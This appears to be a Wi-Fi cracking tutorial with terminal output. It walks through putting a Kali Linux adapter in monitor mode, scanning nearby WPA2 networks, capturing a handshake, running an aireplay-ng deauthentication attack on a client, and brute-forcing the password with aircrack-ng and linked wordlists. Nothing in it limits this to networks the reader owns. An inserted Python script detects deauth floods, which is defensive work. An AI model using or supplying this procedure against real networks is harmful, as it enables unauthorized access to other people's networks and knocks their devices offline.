How to crack a Wi-Fi password?
Preparation:
Kali Linux
An external wireless adapter
Cracking procedure:
First, log in to the Kali system; a virtual machine is fine.
In the VM, click VM - Removable Devices - <name of the wireless adapter> to attach the wireless adapter to the Kali VM.
In Kali, switch to the root account: sudo su root
Run ifconfig to check that the wireless adapter is attached; it normally shows up as wlan0. Note this interface name, wlan0.
┌──(kali㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 00:0c:29:4f:04:de  txqueuelen 1000  (Ethernet)
        RX packets 5401114  bytes 708741419 (675.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4868778  bytes 457372067 (436.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 37851  bytes 14126452 (13.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 37851  bytes 14126452 (13.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 06:8a:73:6a:51:48  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Run airmon-ng to check whether the adapter supports monitor mode: if the adapter is listed in the output, monitor mode is supported.
┌──(root💀kali)-[/home/kali/Desktop]
└─# airmon-ng

PHY     Interface       Driver          Chipset

phy4    wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070
Run airmon-ng start wlan0 to enable monitor mode on the wireless adapter.
┌──(root💀kali)-[/home/kali/Desktop]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    531 NetworkManager
 969681 wpa_supplicant

PHY     Interface       Driver          Chipset

phy4    wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070
                (mac80211 monitor mode vif enabled for [phy4]wlan0 on [phy4]wlan0mon)
                (mac80211 station mode vif disabled for [phy4]wlan0)
"enabled" in the output means monitor mode is active. Run ifconfig again; you will likely find that the adapter's name has changed to wlan0mon.
┌──(root💀kali)-[/home/kali/Desktop]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 00:0c:29:4f:04:de  txqueuelen 1000  (Ethernet)
        RX packets 5401114  bytes 708741419 (675.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4868778  bytes 457372067 (436.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 37851  bytes 14126452 (13.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 37851  bytes 14126452 (13.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec C8-3A-35-CE-82-22-00-8C-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
Run airodump-ng wlan0mon to scan the Wi-Fi networks around you. Here wlan0mon is the current name of the wireless adapter; replace it with yours. If nothing shows up, unplug and replug the adapter, then run airmon-ng start wlan0 and airodump-ng wlan0mon again.
 CH  5 ][ Elapsed: 6 s ][ 2023-01-20 21:23

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 5A:41:20:A3:5E:D9  -70        2        0    0   1  540   WPA2 CCMP   PSK  <length:  0>
 74:85:C4:5A:8E:2D  -56        2        0    0   6  270   WPA2 CCMP   PSK  scivous
 D6:B7:09:B2:D5:4E  -65        4        0    0   3  360   WPA2 CCMP   PSK  <length:  0>
 50:78:B3:61:04:60  -67        2        0    0   4  130   WPA2 CCMP   PSK  ChinaNet-x5cZ
 48:73:97:01:2C:46  -64        2        0    0   9  130   OPN              <length:  0>
 C8:6C:20:46:E6:AC  -72        2        0    0   4  130   WPA2 CCMP   PSK  ChinaNet-5Zzh
 48:73:97:01:2C:47  -73        2        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-2.4G-2C45
 F0:55:01:F3:EF:75  -75        2        0    0  11  360   WPA2 CCMP   PSK  ChinaNet-G64JFP_Wi-Fi5

 BSSID              STATION            PWR   Rate    Lost   Frames  Notes  Probes

 (not associated)   34:EA:34:9C:A1:F9  -74    0 - 1     15        2         ChinaNet-q97E
 C8:3A:35:06:11:08  16:1E:8A:6F:A0:15   -1   11e- 0      0        3
Quitting...
Find the target Wi-Fi name in the ESSID column, e.g. scivous, and note its MAC address (74:85:C4:5A:8E:2D) and its CH number (6). CH is the wireless channel; BSSID is the hardware address of the wireless AP.
Once you have them, press Ctrl+D to stop the scan.
Next, capture packets:
Run: airodump-ng -c 6 --bssid 74:85:C4:5A:8E:2D -w /home/kali/Desktop/data wlan0mon
Here 6 is the CH number, --bssid takes the BSSID, -w takes the path and base name of the output file, and wlan0mon is the adapter name.
 CH  6 ][ Elapsed: 6 s ][ 2023-01-20 21:41

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 74:85:C4:5A:8E:2D  -66  38       48       85   15   6  270   WPA2 CCMP   PSK  H3C_1703

 BSSID              STATION            PWR   Rate    Lost   Frames  Notes  Probes

 74:85:C4:5A:8E:2D  E4:93:6A:CB:87:39  -46    0 - 1e  1114       22
 74:85:C4:5A:8E:2D  64:61:40:F4:47:6D  -48    1e- 1e  1430       74
When this screen appears, capture has started. If it does not appear, unplug and replug the adapter and repeat the previous steps.
Capturing a handshake can be slow. To speed it up you can run a deauthentication (deauth) attack. Keep the capture running, open a new terminal and run:
aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon
Here 10 is the number of attack rounds, -a is the BSSID and -c is the station (the client device's hardware address).
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon
[sudo] password for kali:
21:50:17  Waiting for beacon frame (BSSID: 74:85:C4:5A:8E:2D) on channel 6
21:50:18  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [24|49 ACKs]
21:50:18  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [47|31 ACKs]
21:50:19  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [11|40 ACKs]
21:50:20  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 8|45 ACKs]
21:50:20  Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 5|38 ACKs]
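The bursts of 64 directed deauth frames above are exactly what a wireless IDS looks for. As an added example (not part of the original post), the script below implements a minimal detection rule: it walks a stream of 802.11 management-frame summaries and raises an alert when one station receives more than a threshold of deauthentication frames inside a short window. The frame records are constructed inline using the BSSID and station from the post; feeding real frames from a monitor-mode capture is assumed, not shown.

```python
"""Deauthentication-flood detector over 802.11 management-frame summaries (added example)."""
from collections import defaultdict, deque
from dataclasses import dataclass

DEAUTH_SUBTYPE = 12   # 802.11 management subtype 0xC = Deauthentication
BEACON_SUBTYPE = 8    # subtype 0x8 = Beacon
WINDOW_S = 2.0        # sliding window length in seconds
THRESHOLD = 20        # deauths to one station inside the window that trigger an alert


@dataclass
class Frame:
    ts: float        # capture timestamp in seconds
    subtype: int     # management subtype
    bssid: str       # the AP the frame claims to come from
    dst: str         # addr1: the station being deauthenticated
    reason: int = 0  # reason code (aireplay-ng sends code 7)


def detect_deauth_flood(frames, window_s=WINDOW_S, threshold=THRESHOLD):
    """Return one (bssid, station, first_ts) alert per flooded (bssid, station) pair."""
    recent = defaultdict(deque)  # (bssid, dst) -> timestamps of deauths in the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype != DEAUTH_SUBTYPE:
            continue
        key = (f.bssid, f.dst)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window_s:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((f.bssid, f.dst, q[0]))
    return alerts


def sample_frames():
    """Constructed sample: normal beacons, one benign deauth, then a 64-frame burst."""
    ap, sta = "74:85:C4:5A:8E:2D", "E4:93:6A:CB:87:39"
    frames = [Frame(t * 0.1, BEACON_SUBTYPE, ap, "ff:ff:ff:ff:ff:ff") for t in range(50)]
    frames.append(Frame(1.0, DEAUTH_SUBTYPE, ap, "64:61:40:F4:47:6D", 3))  # single, benign
    frames += [Frame(3.0 + i * 0.01, DEAUTH_SUBTYPE, ap, sta, 7) for i in range(64)]
    return frames


if __name__ == "__main__":
    for bssid, sta, ts in detect_deauth_flood(sample_frames()):
        print(f"ALERT deauth flood: {bssid} -> {sta} starting at t={ts:.2f}s")
```

On the constructed sample the single reason-code-3 deauth stays below the threshold, while the 64-frame burst against E4:93:6A:CB:87:39 triggers one alert; in production, only 802.11w (Protected Management Frames) stops such frames from being honoured, so the rule is a detection, not a fix.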
Check the capture screen: if "][ WPA handshake: 74:85:C4:5A:8E:2D" appears after "CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41", the handshake has been captured. Five new files are created at the output path; find the one ending in .cap:
Brute-force cracking:
Use a Wi-Fi wordlist to brute-force the handshake hash in data-01.cap. This step is offline and needs no network connection.
Run: aircrack-ng -w /home/kali/Desktop/password.txt -b 74:85:C4:5A:8E:2D /home/kali/Desktop/data-01.cap
Wordlists: see https://github.com/conwnet/wpa-dictionary and https://www.freedidi.com/2503.html, or build your own.
Once the crack succeeds, use the recovered password to connect to the Wi-Fi.